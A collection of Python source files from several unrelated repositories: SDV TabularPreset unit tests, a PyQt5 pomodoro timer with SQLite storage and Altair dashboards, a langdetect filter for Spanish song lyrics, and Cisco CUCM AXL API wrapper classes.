from sdv.lite import TabularPreset
from sdv.tabular import GaussianCopula
from tests.utils import DataFrameMatcher
class TestTabularPreset:
def test___init__missing_optimize_for(self):
"""Test the ``TabularPreset.__init__`` method with no parameters.
Side Effects:
- ValueError should be thrown
"""
# Run and Assert
with pytest.raises(
ValueError,
match=('You must provide the name of a preset using the `optimize_for` parameter. '
r'Use `TabularPreset.list_available_presets\(\)` to browse through '
'the options.')):
TabularPreset()
def test___init__invalid_optimize_for(self):
"""Test the ``TabularPreset.__init__`` method with an invalid arg value.
Input:
- optimize_for = invalid parameter
Side Effects:
- ValueError should be thrown
"""
# Run and Assert
with pytest.raises(ValueError, match=r'`optimize_for` must be one of *'):
TabularPreset(optimize_for='invalid')
@patch('sdv.lite.tabular.GaussianCopula', spec_set=GaussianCopula)
def test__init__speed_passes_correct_parameters(self, gaussian_copula_mock):
"""Tests the ``TabularPreset.__init__`` method with the speed preset.
The method should pass the parameters to the ``GaussianCopula`` class.
Input:
- optimize_for = speed
Side Effects:
- GaussianCopula should receive the correct parameters
"""
# Run
TabularPreset(optimize_for='SPEED')
# Assert
gaussian_copula_mock.assert_called_once_with(
table_metadata=None,
categorical_transformer='label_encoding',
default_distribution='gaussian',
rounding=None,
)
metadata = gaussian_copula_mock.return_value._metadata
assert metadata._dtype_transformers.update.call_count == 1
def test_fit(self):
"""Test the ``TabularPreset.fit`` method.
Expect that the model's fit method is called with the expected args.
Input:
- fit data
Side Effects:
- The model's fit method is called with the same data.
"""
# Setup
metadata = Mock()
metadata.to_dict.return_value = {'fields': {}}
model = Mock()
model._metadata = metadata
preset = Mock()
preset._model = model
preset._null_percentages = None
# Run
TabularPreset.fit(preset, pd.DataFrame())
# Assert
model.fit.assert_called_once_with(DataFrameMatcher(pd.DataFrame()))
assert preset._null_percentages == {}
def test_fit_with_null_values(self):
"""Test the ``TabularPreset.fit`` method with null values.
Expect that the model's fit method is called with the expected args, and that
the null percentage is calculated correctly.
Input:
- fit data
Side Effects:
- The model's fit method is called with the same data.
"""
# Setup
metadata = Mock()
metadata.to_dict.return_value = {'fields': {'a': {}}}
model = Mock()
model._metadata = metadata
preset = Mock()
preset._model = model
preset._null_percentages = None
data = {'a': [1, 2, np.nan]}
# Run
TabularPreset.fit(preset, pd.DataFrame(data))
# Assert
model.fit.assert_called_once_with(DataFrameMatcher(pd.DataFrame(data)))
assert preset._null_percentages == {'a': 1.0 / 3}
def test_sample(self):
"""Test the ``TabularPreset.sample`` method.
Expect that the model's sample method is called with the expected args.
Input:
- num_rows=5
Side Effects:
- The model's sample method is called with the same data.
"""
# Setup
model = Mock()
preset = Mock()
preset._model = model
preset._null_percentages = None
# Run
TabularPreset.sample(preset, 5)
# Assert
model.sample.assert_called_once_with(5)
def test_sample_with_null_values(self):
"""Test the ``TabularPreset.sample`` method with null percentages.
Expect that the model's sample method is called with the expected args, and that
null values are inserted back into the sampled data.
Input:
- num_rows=5
Side Effects:
- The model's sample method is called with the expected number of rows.
"""
# Setup
model = Mock()
model.sample.return_value = pd.DataFrame({'a': [1, 2, 3, 4, 5]})
preset = Mock()
preset._model = model
# Convoluted example - 100% percent chance of nulls to make test deterministic.
preset._null_percentages = {'a': 1}
# Run
sampled = TabularPreset.sample(preset, 5)
# Assert
model.sample.assert_called_once_with(5)
assert sampled['a'].isna().sum() == 5
def test_list_available_presets(self):
"""Tests the ``TabularPreset.list_available_presets`` method.
This method should print all the available presets.
Side Effects:
- The available presets should be printed.
"""
# Setup
out = io.StringIO()
expected = ('Available presets:\n{\'SPEED\': \'Use this preset to minimize the time '
'needed to create a synthetic data model.\'}\n\nSupply the desired '
'preset using the `opimize_for` parameter.\n\nHave any requests for '
'custom presets? Contact the SDV team to learn more an SDV Premium license.')
# Run
TabularPreset(optimize_for='SPEED').list_available_presets(out)
# Assert
assert out.getvalue().strip() == expected
``` |
{
"source": "JonathanElejalde/pomodoro",
"score": 4
} |
#### File: pomodoro/console/database.py
```python
def create_database(cursor):
# Make some fresh tables using executescript()
cursor.executescript(
"""
CREATE TABLE IF NOT EXISTS Pomodoros (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
time INTEGER NOT NULL,
date TEXT,
hour TEXT,
category_id INTEGER,
project_id INTEGER,
satisfaction INTEGER NOT NULL
);
CREATE TABLE IF NOT EXISTS Projects (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT,
start TEXT,
end TEXT,
category_id,
canceled TEXT DEFAULT "No"
);
CREATE TABLE IF NOT EXISTS Categories (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
category TEXT
);
"""
)
if __name__ == "__main__":
import sqlite3
import os
# --CREATING THE DATABASE--
os.chdir("..") # Go up one directory from working directory
conn = sqlite3.connect("data\pomodoros.db")
cursor = conn.cursor()
# This will run if the database is not created already
create_database(cursor)
```
#### File: pomodoro/console/pyqt5_app.py
```python
import sys
import winsound
import time
from functools import partial
from queries import Pomodoro
from PomodoroUI import PomodoroUI
from RecallsUI import Recalls
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QPushButton,
QMessageBox,
)
from PyQt5 import QtGui, QtWidgets
from PyQt5.QtCore import Qt, QThread, pyqtSignal
# Todo's
# Pointing to the same database
# Add docstring
# try to improve the code
class MainPomodoro:
def __init__(self):
# Interface
self.main_window = QMainWindow()
self.pomodoro_ui = PomodoroUI()
self.pomodoro_ui.setupUi(self.main_window)
self.recall_window = QtWidgets.QWidget()
self.recall_ui = Recalls()
self.recall_ui.setupUi(self.recall_window)
# Query manager
self.pomodoro_manager = Pomodoro()
# Track variables for queries and confirmation purposes
self.category_id = None
self.project_id = None
self.project_name = None
self.satisfaction = None
##### Buttons ######
# Start the app in home
self.pomodoro_ui.stacked_widget.setCurrentWidget(self.pomodoro_ui.home)
self.pomodoro_ui.create_pomodoro_btn.clicked.connect(
self.show_categories)
self.pomodoro_ui.start_pomodoro_btn.clicked.connect(self.start_timer)
# Add new category
self.pomodoro_ui.add_new_cat_btn.clicked.connect(self.add_category)
self.pomodoro_ui.add_proj_btn.clicked.connect(self.add_project)
# End or Cancel a project
self.pomodoro_ui.end_proj_btn.clicked.connect(
lambda x: self.end_project(self.project_id, self.project_name))
self.pomodoro_ui.cancel_proj_btn.clicked.connect(
lambda x: self.cancel_project(self.project_id, self.project_name))
# open a new dialog if clicked add recall
self.pomodoro_ui.add_recall_btn.clicked.connect(self.start_recall)
# Allows to go back
self.pomodoro_ui.previous_window_btn1.clicked.connect(
self.previous_window)
self.pomodoro_ui.previous_window_btn2.clicked.connect(
self.previous_window)
self.pomodoro_ui.previous_window_btn3.clicked.connect(
self.previous_window)
def clear_layout(self, layout):
while layout.count():
child = layout.takeAt(0)
if child.widget():
child.widget().deleteLater()
def show_categories(self):
# Clear layout
self.clear_layout(self.pomodoro_ui.cat_layout)
# Add the categories
font = QtGui.QFont()
font.setPointSize(12)
buttons = dict()
# Get the categories
categories = self.pomodoro_manager.get_categories()
# Add the categories to the interface
for id, category in categories:
buttons[category] = QPushButton(category)
buttons[category].setFont(font)
self.pomodoro_ui.cat_layout.addWidget(buttons[category])
buttons[category].clicked.connect(partial(self.show_projects, id))
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.categories)
def show_projects(self, category_id):
# Track the category id
self.category_id = category_id
# Clear layout
self.clear_layout(self.pomodoro_ui.proj_layout)
font = QtGui.QFont()
font.setPointSize(12)
# Get the projects
projects = self.pomodoro_manager.get_projects(category_id)
buttons = dict()
# Add the projects to the interface
for i, project in enumerate(projects):
project_id, project_name = project
# add buttons
buttons[project_name] = QPushButton(project_name)
buttons[project_name].setFont(font)
self.pomodoro_ui.proj_layout.addWidget(buttons[project_name])
buttons[project_name].clicked.connect(
partial(self.show_timer, project_id, project_name))
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.projects)
def show_timer(self, project_id, project_name):
# Track project_id and project_name
self.project_id = project_id
self.project_name = project_name
self.pomodoro_ui.current_proj.setText(project_name)
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.timer)
def start_timer(self):
self.pomodoro_ui.pomodoro_added_label.setText("")
self.pomodoro_timer = Timer()
self.pomodoro_timer.change_time.connect(self.set_timer)
self.pomodoro_timer.change_label.connect(self.set_label)
self.pomodoro_timer.finished.connect(self.qualify_pomodoro)
self.pomodoro_timer.start()
def start_recall(self):
self.recall_window.show()
def qualify_pomodoro(self):
message = QMessageBox.question(
self.main_window,
"Pomodoro's satisfaction",
"Did you feel good in this pomodoro",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.satisfaction = 1
elif message == QMessageBox.No:
self.satisfaction = 2
# Save the pomodoro into the database
self.pomodoro_manager.add_pomodoro(self.category_id, self.project_id,
self.satisfaction)
self.pomodoro_ui.pomodoro_added_label.setText("The pomodoro was added")
def set_timer(self, time_left):
self.pomodoro_ui.timer_label.setText(time_left)
def set_label(self, label):
self.pomodoro_ui.working_resting_label.setText(label)
def add_category(self):
category = self.pomodoro_ui.new_category_text.text()
self.pomodoro_manager.create_category(category)
# Refresh the category view
self.show_categories()
self.pomodoro_ui.new_category_text.setText("")
def add_project(self):
project = self.pomodoro_ui.new_project_text.text()
self.pomodoro_manager.create_project(project, self.category_id)
# Refresh the project view
self.show_projects(self.category_id)
self.pomodoro_ui.new_project_text.setText("")
def end_project(self, project_id, project_name):
message = QMessageBox.question(
self.main_window,
"End project",
f"Do you want to end project {project_name}",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.pomodoro_manager.end_project(project_id)
self.pomodoro_manager.conn.commit()
# Return to projects
self.show_projects(self.category_id)
def cancel_project(self, project_id, project_name):
message = QMessageBox.question(
self.main_window,
"Cancel project",
f"Do you want to cancel project {project_name}",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.pomodoro_manager.cancel_project(project_id)
self.pomodoro_manager.conn.commit()
# Return to projects
self.show_projects(self.category_id)
def show(self):
self.main_window.show()
def previous_window(self):
self.pomodoro_ui.stacked_widget.setCurrentIndex(
(self.pomodoro_ui.stacked_widget.currentIndex() - 1) % 4)
class Timer(QThread):
_end_sound = "countdown.wav"
change_time = pyqtSignal(str)
change_label = pyqtSignal(str)
def __init__(self, working=25, resting=5):
super().__init__()
self.working = working
self.resting = resting
def run(self):
# Start working timer
working_length = 60 * self.working
label = "Working"
self.change_label.emit(label)
while working_length > 0:
mins, seconds = divmod(working_length, 60)
time_left = str(mins).zfill(2) + ":" + str(seconds).zfill(2)
QThread.sleep(1)
working_length -= 1
self.change_time.emit(time_left)
winsound.PlaySound(self._end_sound, winsound.SND_FILENAME)
        # Start resting timer
rest_length = 60 * self.resting
label = "Resting"
self.change_label.emit(label)
while rest_length > 0:
mins, seconds = divmod(rest_length, 60)
time_left = str(mins).zfill(2) + ":" + str(seconds).zfill(2)
QThread.sleep(1)
rest_length -= 1
self.change_time.emit(time_left)
winsound.PlaySound(self._end_sound, winsound.SND_FILENAME)
if __name__ == "__main__":
app = QApplication(sys.argv)
main_win = MainPomodoro()
main_win.show()
sys.exit(app.exec_())
```
#### File: JonathanElejalde/pomodoro/dashboard.py
```python
from altair.vegalite.v4 import schema
from altair.vegalite.v4.schema.channels import Tooltip
import pandas as pd
import altair as alt
import numpy as np
from queries import Pomodoro
THEME = 'magma'
# TODO: Add docstrings where needed
def get_current_date():
"""
    Gets the current date used to build the default charts.
returns:
date: tuple. (year, month, day)
"""
date = pd.to_datetime('now')
year = date.year
month = date.month
day = date.day
return (year, month, day)
# POMODORO CHARTS
def monthly_chart(year, month, df):
"""
"""
# Filter
df_copy = df.copy()
filtered = df_copy.loc[f'{year}/{month}']
month_name = filtered.full_date.dt.month_name()
month_name = month_name.iloc[0]
base = alt.Chart(
filtered, title=f'Productivity in {month_name}').mark_circle().encode(
x=alt.X('monthdate(full_date):O',
title='Days',
axis=alt.Axis(labelAngle=-90)),
y=alt.Y('hoursminutes(full_date)', title='Daily hours'),
).properties(width=400, height=200)
stack = base.mark_bar().encode(y=alt.Y('count()', title='Daily pomodoros'),
color=alt.Color('project',
title='Project names'),
tooltip=[
alt.Tooltip('category',
title='Category'),
alt.Tooltip('project',
title='Project name'),
alt.Tooltip('count()',
title='Pomodoros'),
alt.Tooltip(
'sum(pomodoro_length)',
title='Minutes invested this day')
])
scatter = base.encode(color=alt.Color('project', title='Project names'),
tooltip=[
alt.Tooltip('category', title='Category'),
alt.Tooltip('project', title='Project name'),
alt.Tooltip('yearmonthdate(full_date)',
title='Date'),
alt.Tooltip('pomodoro_calification',
title='Satisfaction'),
alt.Tooltip('hoursminutes(full_date)',
title='Start')
],
size=alt.Size('pomodoro_calification',
sort='descending',
title='Calification'))
chart = alt.hconcat(stack, scatter)
return chart
def hourly_chart(df):
"""
"""
df_copy = df.copy()
# Get only the bad pomodoros
bad_condition = df_copy.pomodoro_calification == 'Bad'
bad_df = df_copy[bad_condition]
# Filtered pomodoros without calification
condition = df_copy.pomodoro_calification != 0
new_df = df_copy[condition]
grouped_chart = alt.Chart(new_df).mark_bar().encode(
alt.X('pomodoro_calification:N', title="", axis=None),
alt.Y('count():Q', title='Pomodoro count'),
alt.Column('hours(full_date):O',
title='Good and Bad pomodoros by hour'),
alt.Color('pomodoro_calification:N', title='Calification'),
tooltip=[alt.Tooltip('hours(full_date)'),
alt.Tooltip('count()')]).properties(width=20, height=200)
heatmap = alt.Chart(
bad_df, title='Bad pomodoros by day and hour').mark_rect().encode(
alt.X('hours(full_date)',
title='Hours',
axis=alt.Axis(labelAngle=-90)),
alt.Y('day(full_date):O', title='Day of the week'),
alt.Color('count():Q',
title='Pomodoro count',
scale=alt.Scale(domain=(10, 1), scheme=THEME)),
tooltip=[
alt.Tooltip('count()', title='Bad pomodoros'),
alt.Tooltip('sum(pomodoro_length)', title='Minutes wasted'),
alt.Tooltip('hours(full_date)', title='Hour')
]).properties(width=400, height=200)
return grouped_chart & heatmap
## PROJECT CHARTS
def create_projects_df(df):
"""
"""
df_copy = df.copy()
date_format = '%Y-%m-%d'
tmp_projects = df_copy.groupby('project').agg({
'category':
'first',
'project_start':
'first',
'project_end':
'first',
'project_cancel':
'first',
'pomodoro_date':
'nunique',
'pomodoro_length':
'sum',
'pomodoro_calification':
'count'
})
# Rename the columns resulting from the groupby
project_columns = {
'project_start': 'start',
'project_end': 'end',
'project_cancel': 'cancel',
'pomodoro_date': 'working_days',
'pomodoro_length': 'minutes',
'pomodoro_calification': 'total_pomodoros'
}
tmp_projects.rename(columns=project_columns, inplace=True)
# Create separete columns for the pomodoro califications
tmp_projects_2 = df_copy.groupby(
'project')['pomodoro_calification'].value_counts().unstack().fillna(0)
# Merge the two resulting groupby dataframes
projects = pd.merge(tmp_projects,
tmp_projects_2,
left_index=True,
right_index=True)
# Create the project status column.
conditions = [projects.end.notnull(), projects.cancel.notnull()]
choices = ['Ended', 'Canceled']
projects['status'] = np.select(conditions, choices, default='On')
# Create the days column. It counts the amount of days since its
# start until its end/cancel date or current day if still on.
today = pd.to_datetime("today", format=date_format)
end_mask = (projects.status == "Ended")
cancel_mask = (projects.status == 'Canceled')
on_mask = (projects.status == 'On')
projects['days'] = 0
projects.loc[end_mask, 'days'] = (projects.end - projects.start).dt.days
projects.loc[cancel_mask,
'days'] = (projects.cancel - projects.start).dt.days
projects.loc[on_mask, 'days'] = (today - projects.start).dt.days
# Convert the minutes count into hours
projects['hours'] = pd.to_datetime(projects.minutes,
unit='m').dt.strftime('%H:%M')
# Convert the minutes column to amount of pomodoros
projects['pomodoros'] = projects.minutes / 25
projects.reset_index(inplace=True)
return projects
def projects_hours_days(df):
"""
"""
df_copy = df.copy()
single = alt.selection_single()
chart = alt.Chart(
df_copy, title='Projects').mark_point(filled=True).encode(
alt.X('yearmonthdate(start)', title="Project starting date"),
alt.Y('days', title='Days since the start'),
color=alt.Color(
'status:N',
title='Project current status',
sort='descending',
),
size=alt.Size('hours',
title='Total hours invested in the project'),
tooltip=[
alt.Tooltip('category', title='Category'),
alt.Tooltip('project', title='Project'),
alt.Tooltip('start', title='Project starting date'),
alt.Tooltip('status', title='Status'),
alt.Tooltip('days', title='Days since the start'),
alt.Tooltip('working_days',
title='Days with at least 1 pomodoro'),
alt.Tooltip('hours', title='Total hours invested'),
alt.Tooltip('pomodoros', title='Amount of pomodoros made')
]).add_selection(single).properties(width=800).interactive()
return chart
# Make it possible to show several projects
def plot_project(project, df):
"""
"""
df_copy = df.copy()
# Filterer the project
filtered = df_copy[df_copy.project == project]
# Get start and end dates
row = filtered.iloc[0]
start = row.project_start
end = row.project_end
cancel = row.project_cancel
start = start.date()
if end:
last = end.date()
elif cancel:
last = cancel.date()
else:
today = pd.to_datetime("today")
last = today.date()
line = alt.Chart(filtered).mark_bar().encode(
alt.X(
'yearmonthdate(full_date):O',
# scale=alt.Scale(
# domain=[start.isoformat(), last.isoformat()]),
axis=alt.Axis(labelAngle=-90)),
alt.Y('count()')).configure_range(category={'scheme': 'dark2'})
return line
def my_theme():
return {
'config': {
'view': {
'continuousHeight': 300,
'continuousWidth': 400
}, # from the default theme
'range': {
'category': {
'scheme': THEME
}
}
}
}
# Altair theme
alt.themes.register('my_theme', my_theme)
alt.themes.enable('my_theme')
if __name__ == "__main__":
pomodoro = Pomodoro()
df = pomodoro.create_df(pomodoro.QUERY)
project = 'El asesinato de <NAME> - <NAME>'
filtered = plot_project(project, df)
``` |
{
"source": "JonathanElejalde/reggaeton_songs_nlp",
"score": 3
} |
#### File: reggaeton_songs_nlp/preprocessing/detect_language.py
```python
import pandas as pd
import langdetect
from langdetect import DetectorFactory
# Set the seed of the langdetect to reproducible results
detector_factory_seed = 10
DetectorFactory.seed = detector_factory_seed
def get_lang_probability(lang_prob):
"""
Takes a string with the format lang:probability and returns
a tuple (lang, probability)
Args:
lang_prob: str
"""
lang, probability = lang_prob.split(":")
try:
probability = float(probability)
except Exception as e:
print("Cound not convert probability to float")
print(e)
return (lang, probability)
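# Example of the expected input/output (the probability value is illustrative):
#     get_lang_probability("es:0.857") -> ("es", 0.857)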
def detect_songs_language(song_lyrics):
"""
Takes the lyrics of a song and returns
the languages that it has and the probabilities
in a list of tuples
Args:
song_lyrics: str
returns:
lang_probs = list of tuples (lang, probability)
"""
try:
probs = langdetect.detect_langs(song_lyrics)
lang_probs = list()
for prob in probs:
str_lang_prob = str(prob)
lang_prob = get_lang_probability(str_lang_prob)
lang_probs.append(lang_prob)
return lang_probs
except Exception as e:
print(e)
        # On error, pretend the lyrics are in English so that
        # this particular song gets deleted later
lang_probs = [("en", 0.9)]
return lang_probs
def delete_rows(df, rows):
"""
It takes a dataframe and deletes the rows by index.
Then it returns the resulting dataframe
Args:
df: pandas dataframe
rows: list. list of indexes
returns:
df: pandas dataframe
"""
df_len = len(df)
print(f"The dataframe started with {df_len} rows")
df = df.drop(index=rows)
df_len = len(df)
print(f"The dataframe ended with {df_len} rows")
return df
def update_lyrics(lyrics):
"""
Takes the lyrics of a song, splits it into
paragraphs and detects the language of each
paragraph. Finally joins the paragraphs that
    are in Spanish.
Args:
lyrics: str
returns:
lyrics: str. The updated version of the song
with just spanish
"""
paragraphs = lyrics.split("\r\n\r\n")
updated_lyrics = list()
paragraphs_deleted = 0
for paragraph in paragraphs:
paragraph_lang = detect_songs_language(paragraph)
# If the paragraph has more than one language skip it
if len(paragraph_lang) > 1:
paragraphs_deleted += 1
continue
lang, prob = paragraph_lang[0]
if lang == "es":
updated_lyrics.append(paragraph)
else:
paragraphs_deleted += 1
lyrics = "\r\n\r\n".join(updated_lyrics)
return lyrics
def delete_no_spanish(df, lang_threshold):
"""
    Takes the songs dataframe and detects the language of each song's
    lyrics. If the lyrics are completely in Spanish, keep them; if they mix
    languages but the dominant language is Spanish (probability above
    lang_threshold), delete the non-Spanish paragraphs. Otherwise, drop
    the song.
Args:
df: pandas dataframe
lang_threshold: float
returns:
updated_df: pandas dataframe
"""
delete_songs_index = list()
no_complete_spanish_index = list()
deleted_songs_count = 0
no_spanish_count = 0
for index, lyrics in df.lyrics.iteritems():
lang_probs = detect_songs_language(lyrics)
# If true it means the song has more than one language
if len(lang_probs) > 1:
# the first entry is the language with the highest probability
lang, prob = lang_probs[0]
if (lang == "es") and (prob > lang_threshold):
no_complete_spanish_index.append(index)
no_spanish_count += 1
else:
deleted_songs_count += 1
delete_songs_index.append(index)
# If just one language check for spanish
else:
lang, prob = lang_probs[0]
if lang != "es":
delete_songs_index.append(index)
deleted_songs_count += 1
# Clean the lyrics that are not entirely in spanish
for index in no_complete_spanish_index:
lyrics = df.iloc[index].lyrics
new_lyrics = update_lyrics(lyrics)
# change the lyrics in the dataframe
df.at[index, "lyrics"] = new_lyrics
# Delete non-spanish songs
updated_df = delete_rows(df, delete_songs_index)
print(f"Amount of songs deleted: {deleted_songs_count}")
print(f"Amount of no-complete spanish: {no_spanish_count}")
return updated_df
if __name__ == "__main__":
pass
# data_path = "..\data\lyrics_labeled.csv"
# lang_threshold = 0.80
# songs = pd.read_csv(data_path)
# prueba = songs[:200]
# songs_updated = delete_no_spanish(prueba, lang_threshold)
# songs_updated.to_csv("..\data\only_spanish_lyrics.csv", index=False)
``` |
{
"source": "jonathanelscpt/ciscocucmapi",
"score": 2
} |
#### File: ciscocucmapi/api/advanced.py
```python
from operator import methodcaller
from zeep.helpers import serialize_object
from .._internal_utils import flatten_signature_kwargs
from ..helpers import get_model_dict
from .base import DeviceAXLAPI
from .base import SimpleAXLAPI
class CalledPartyTracing(SimpleAXLAPI):
_factory_descriptor = "called_party_tracing"
supported_methods = ["add", "list", "remove"]
def add(self, directorynumber, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DirNumberAliasLookupandSync(SimpleAXLAPI):
_factory_descriptor = "directory_number_alias_sync"
def add(self, ldapConfigName, ldapManagerDisgName, ldapPassword, ldapUserSearch, servers,
ldapDirectoryServerUsage="DirSync", enableCachingofRecords=False, sipAliasSuffix=None,
keepAliveSearch=None, keepAliveTime=5, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class IlsConfig(SimpleAXLAPI):
_factory_descriptor = "ils_config"
supported_methods = ["get", "update"]
def __init__(self, connector, object_factory):
super().__init__(connector, object_factory)
self._get_model_name = "NewIlsConfig"
def get(self, clusterId, returnedTags=None, **kwargs):
if not returnedTags:
get_model = self._get_wsdl_obj(self._get_model_name)
returnedTags = get_model_dict(get_model)
return super().get(clusterId=clusterId, returnedTags=returnedTags, **kwargs)
class MessageWaiting(SimpleAXLAPI):
_factory_descriptor = "mwi_number"
def add(self, pattern, routePartitionName=None, callingSearchSpaceName=None, messageWaitingIndicator=False,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteCluster(SimpleAXLAPI):
_factory_descriptor = "remote_cluster"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "do_update"]
def add(self, clusterId, fullyQualifiedName, emcc=None, pstnAccess=None, rsvpAgent=None, tftp=None, lbm=None,
uds=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
def do_update(self, clusterId, server):
kwargs = {
"clusterId": clusterId,
"server": server
}
options_method = methodcaller("".join(["doUpdate", self.__class__.__name__]), **kwargs)
axl_resp = options_method(self.connector.service)
return self.object_factory(
"".join([self.__class__.__name__]),
serialize_object(axl_resp)["return"])
class SecureConfig(SimpleAXLAPI):
_factory_descriptor = "secure_config"
supported_methods = ["get", "update"]
def get(self, name="NativeEmergencyCallHandling", returnedTags=None, **kwargs):
get_kwargs = flatten_signature_kwargs(self.get, locals())
return super().get(**get_kwargs)
def update(self, name="NativeEmergencyCallHandling", value="Enabled", **kwargs):
        update_kwargs = flatten_signature_kwargs(self.update, locals())
        return super().update(**update_kwargs)
class VoiceMailPilot(SimpleAXLAPI):
_factory_descriptor = "voicemail_pilot"
def add(self, dirn, isDefault=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VoiceMailProfile(DeviceAXLAPI):
_factory_descriptor = "voicemail_profile"
def add(self, name, voiceMailPilot, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnGateway(SimpleAXLAPI):
_factory_descriptor = "vpn_gateway"
def add(self, name, url, certificates, vpnGateways=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnGroup(SimpleAXLAPI):
_factory_descriptor = "vpn_group"
def add(self, name,
vpnGateways=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnProfile(SimpleAXLAPI):
_factory_descriptor = "vpn_profile"
def add(self, name, autoNetworkDetection=False, mtu=1920, failToConnect=30, enableHostIdCheck=True,
clientAuthentication="User and Password", pwdPersistant=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
```
#### File: ciscocucmapi/api/device.py
```python
from .._internal_utils import flatten_signature_kwargs
from .base import DeviceAXLAPI
from .base import SimpleAXLAPI
class CommonDeviceConfig(DeviceAXLAPI):
_factory_descriptor = "common_device_config"
supported_methods = ["model", "create", "add", "get", "list", "update", "remove", "apply", "reset"]
def add(self, name, softkeyTemplateName=None, userLocale=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class CommonPhoneConfig(DeviceAXLAPI):
_factory_descriptor = "common_phone_profile"
supported_methods = ["model", "create", "add", "get", "list", "update", "remove", "apply", "reset"]
def add(self, name, unlockPwd=None, featureControlPolicy=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class CtiRoutePoint(DeviceAXLAPI):
_factory_descriptor = "cti_route_point"
def add(self, name, devicePoolName, product="CTI Route Point", protocol="SCCP", **kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "CTI Route Point"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DefaultDeviceProfile(SimpleAXLAPI):
_factory_descriptor = "default_device_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options"]
def add(self, name, product, phoneButtonTemplate="Universal Device Template Button Layout", softkeyTemplate=None,
protocol="SIP", protocolSide="User", **kwargs):
# the name is not obvious in the UI. It appears to default to a concat of product and protocol.
# it may be useful to log a warning for this...
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Device Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DeviceProfile(SimpleAXLAPI):
_factory_descriptor = "udp"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options"]
def add(self, name, product, phoneTemplateName,
protocol="SIP",
**kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Device Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class FeatureControlPolicy(SimpleAXLAPI):
_factory_descriptor = "feature_control_policy"
def add(self, name,
features=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class IpPhoneServices(SimpleAXLAPI):
_factory_descriptor = "ip_phone_service"
def add(self, serviceName, asciiServiceName, serviceUrl, secureServiceUrl=None, serviceCategory="XML Service",
serviceType="Standard IP Phone Service", enabled=True, enterpriseSubscription=False, parameters=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class Line(DeviceAXLAPI):
_factory_descriptor = "line"
supported_methods = [
"model", "create", "add", "get", "update", "list", "remove", "options", "apply", "restart", "reset"
]
def __init__(self, connector, object_factory):
super().__init__(connector, object_factory)
def add(self, pattern, routePartitionName,
usage="Device",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class NetworkAccessProfile(SimpleAXLAPI):
_factory_descriptor = "network_access_profile"
def add(self, name, vpnRequired="Default", proxySettings="None", proxyHostname="", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class Phone(DeviceAXLAPI):
_factory_descriptor = "phone"
supported_methods = [
"model", "create", "add", "get", "list", "update", "remove",
"options", "wipe", "lock",
"apply", "restart", "reset",
]
@staticmethod
def _check_confidential_access(confidentialAccess):
"""Workaround for AXL defect not accepting None for 'confidentialAccessMode'"""
if not confidentialAccess['confidentialAccessMode']:
confidentialAccess['confidentialAccessMode'] = ''
return confidentialAccess
def add(self, name, product, devicePoolName, locationName="Hub_None", protocol="SIP",
commonPhoneConfigName="Standard Common Phone Profile", **kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Phone"
add_kwargs = flatten_signature_kwargs(self.add, locals())
try:
add_kwargs['confidentialAccess'] = self._check_confidential_access(add_kwargs['confidentialAccess'])
except KeyError:
pass
return super().add(**add_kwargs)
def update(self, **kwargs):
try:
kwargs['confidentialAccess'] = self._check_confidential_access(kwargs['confidentialAccess'])
except KeyError:
pass
return super().update(**kwargs)
def wipe(self, **kwargs):
"""Allows Cisco's newer Android-based devices, like the Cisco DX650,
to be remotely reset to factory defaults, removing user specific settings and data.
:param kwargs: phone name or uuid
:return: None
"""
# check_identifiers(self._wsdl_objects["name_and_guid_model"], **kwargs)
return self._serialize_axl_object("wipe", **kwargs)
def lock(self, **kwargs):
return self._serialize_axl_object("lock", **kwargs)
class PhoneButtonTemplate(DeviceAXLAPI):
_factory_descriptor = "phone_button_template"
